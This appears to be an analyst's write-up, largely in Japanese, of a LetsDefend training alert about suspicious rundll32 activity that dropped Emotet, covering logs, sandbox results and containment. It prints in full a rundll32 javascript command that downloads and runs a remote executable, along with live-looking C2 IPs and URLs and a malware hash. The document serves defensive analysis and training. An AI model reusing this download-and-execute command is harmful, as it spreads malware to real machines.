LetsDefend level 1 alert SOC125 - Suspicious Rundll32 Activity event-id 58
Details
EventID: 58
Event Time: Feb. 14, 2021, 12:13 p.m.
Rule: SOC125 - Suspicious Rundll32 Activity
Level: Security Analyst
Source Address 172.16.17.49
Source Hostname EmilyComp
File Name KBDYAK.exe
File Hash a4513379dad5233afa402cc56a8b9222
File Size 848.00 Kb
Device Action Allowed
Download (Password:infected): a4513379dad5233afa402cc56a8b9222.zip
playbook
Define Threat Indicator
Answer: Other
Check if the malware is quarantined/cleaned
EndpointManagement
CMD History
05.12.2020 16:12: cd
05.12.2020 16:13: dir
05.12.2020 16:14: cd Users
05.12.2020 16:15: dir
05.12.2020 16:16: cd Emily
05.12.2020 16:17: cd Desktop
05.12.2020 16:18: type notes.txt
14.02.2021 12:12: rundll32.exe javascript:'../mshtml,RunHTMLApplication ';document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')'
rundll32.exeの実行に関わるhttp[:]//ru-uid-507352920.pp.ru/KBDYAK.exeが怪しい。
VirusTotal: https://www.virustotal.com/gui/domain/ru-uid-507352920.pp.ru
urlscan: https://urlscan.io/result/4367cc1e-3aa3-468f-8cdf-846fe7335793/#summary
黒です。VirusTotalの結果から分かるこのドメインと通信するファイルが真っ赤になっている。
Network Connections
2020-12-05 12:13: 140.82.121.4 2020-12-05 12:14: 172.217.169.110 2020-12-05 22:13: 172.217.169.110 2020-12-05 22:14: 172.217.169.110 2020-12-05 22:15: 172.16.17.49 2020-12-05 22:16: 216.58.206.174 2021-02-14 12:12: 67.68.210.95 2020-02-14 12:13: 162.241.242.173
67.68.210.95と162.241.242.173が今回のアラートに関わるのか。
- 67.68.210.95
VirusTotal: https://www.virustotal.com/gui/ip-address/67.68.210.95
ip-sc: https://ip-sc.net/ja/r/67.68.210.95
AbuseIPDB: Not found
レビューではemotetとの関連もあると言われている。 - 162.241.242.173
VirusTotal: https://www.virustotal.com/gui/ip-address/162.241.242.173
ip-sc:https://ip-sc.net/ja/r/162.241.242.173
AbuseIPDB: Not found
emotet?
Process History
AcroRd32.exe
MD5:357b03e0b8d0c30713f2c41ce60583c5
Path:c:/program files (x86)/adobe/acrobat reader dc/reader/acrord32.exe
Chrome.exe
MD5:b015ecd030da9a979e6d1a3d25f8fd86
Size:1.72 MB
Path:c:/program files/internet explorer/iexplore.exe
ccsvchst.exe
MD5:aba0a9709e6c11bc0b6ee21de36743e3
Path:c:/program files (x86)/symantec/symantec endpoint protection/14/bin/ccsvchst.exe
Size:142.45 KB
notepad.exe
MD5:FC2EA5BD5307D2CFA5AAA38E0C0DDCE9
Size:216 KB
Path:c:/windows/system32/notepad.exe
rundll32.exe
command:rundll32.exe javascript:'../mshtml,RunHTMLApplication ';document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')'
KBDYAK.exe
MD5:a4513379dad5233afa402cc56a8b9222
Size:848.00 Kb
KBDYAK.exeはしっかり動いていた。
VIrusTotal:https://www.virustotal.com/gui/file/ccd380ea868ffad4f960d7455fecf88c2ac3550001bbb6c21c31ae70b3bbf4f6
61/68!!!!!
Answer: Not Quarantined
Analyze Malware
AnyRunの同じ時期のもの: https://app.any.run/tasks/35164fdb-34bc-4778-96e7-fdbaa21b218e/
こうしてdropされたファイルはこちら、
こちらがEmotetである。
Write Registry
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content Name: CachePrefix Value: (value not set) Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies Name: CachePrefix Value: Cookie: Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History Name: CachePrefix Value: Visited: Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings Name: ProxyEnable Value: 0 Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections Name: SavedLegacySettings Value: 46 00 00 00 A5 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 E3 33 BB EA B1 D3 01 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 7D 6C B0 50 D9 C5 73 F7 0B 00 00 00 00 00 00 00 6D 00 33 00 32 00 5C 00 4D 00 53 00 49 00 4D 00 47 00 33 00 32 00 2E 00 64 00 6C 00 01 00 00 00 04 AA 40 00 14 AA 40 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 C0 A8 01 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 80 5D 3F 00 98 37 40 00 00 08 00 00 02 00 00 00 00 00 00 60 00 00 00 20 60 04 00 00 B8 A9 40 00 02 00 00 00 88 02 00 00 60 04 00 00 B8 A9 40 00 04 00 00 00 F8 01 00 00 B2 84 00 00 88 B6 40 00 B8 4B 40 00 43 00 3A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IEの設定変更
Connections
- 45.55.36.51
- 37.70.8.161
- 162.241.242.173
- 45.55.219.163
- 46.105.131.79
- 78.24.219.147
- 68.188.112.97
- 67.68.210.95
HTTP/HTTPS requests
- http[:]//67.68.210.95/K94d4BuWIzlOK/cGT0xBMOeVnh/
- http[:]//162.241.242.173:8080/bAg9s0/Muke10/sLGB0Z5BBYBm8/
- http[:]//45.55.36.51:443/g3bT/X7IhfMIzGl5mxg/y040km/ekgBVK85a0VlL/RrybngSesi5eeg/
- http[:]//45.55.219.163:443/pbzV/AkFGwPqfDbGT8m/QKGk59oXuP/
- http[:]//68.188.112.97/6lsUqSoDIWP6cDvQzs/WEEkg/g9rvy3yhkE2ITGP/
- http[:]//46.105.131.79:8080/jGgoU5Bk/rwqQCjYSH37wpNz/2GpI9xsKcQH5d26i8q/
- http[:]//78.24.219.147:8080/htGuq4cceB/
- http[:]//37.70.8.161/Jp3o3IFy/0o8VqcG/6SUYBOD345yvNLMM/rXnHml6/xa52efTt/
Answer: Malicious
Check If Someone Requested the C2
| # | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|---|
| 2 | Aug, 29, 2020, 10:32 PM | Proxy | 172.16.17.14 | 57441 | 67.68.210.95 | 80 |
| 354 | Feb, 14, 2021, 12:13 PM | Proxy | 172.16.17.49 | 14474 | 67.68.210.95 | 80 |
| 355 | Feb, 14, 2021, 12:13 PM | Proxy | 172.16.17.49 | 13434 | 162.241.242.173 | 8080 |
2
Request URL: http://67.68.210.95/HX8tpawYAxLaiFMTGa1/1dG3m5wmqVifrhsZXsG/ Request Method: POST Device Action: Permitted Process: rasser.exe Parent MD5: bac591433cdada740aab065885d408bc
今回のものには関係ないかもしれないが、以前にもEmotetに関連するものがあるかもしれない。
354
URL: http://67.68.210.95/2SjAcA5VhhJiFjBQ/vvszin6AicmidnG5bg/DaDVVYvfEHlcIIcgcu/0U5UiIkaHankrHGa/FYSJmdQDj2ejni1UI/ Device Actiov: Allowed
355
URL: http://162.241.242.173:8080/HQ9TemntfBzghL/3wz57awaSHlQrrnP/S78n2aUqY7U/ Device Actiov: Allowed
Answer: Accessed
Containment
Containment!
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| a4513379dad5233afa402cc56a8b9222 | MD5 Hash | drop emotet |
| http[:]//67.68.210.95/2SjAcA5VhhJiFjBQ/vvszin6AicmidnG5bg/DaDVVYvfEHlcIIcgcu/0U5UiIkaHankrHGa/FYSJmdQDj2ejni1UI/ | URL Address | emotet |
| http[:]//162.241.242.173:8080/HQ9TemntfBzghL/3wz57awaSHlQrrnP/S78n2aUqY7U/ | URL Address | emotet |
End
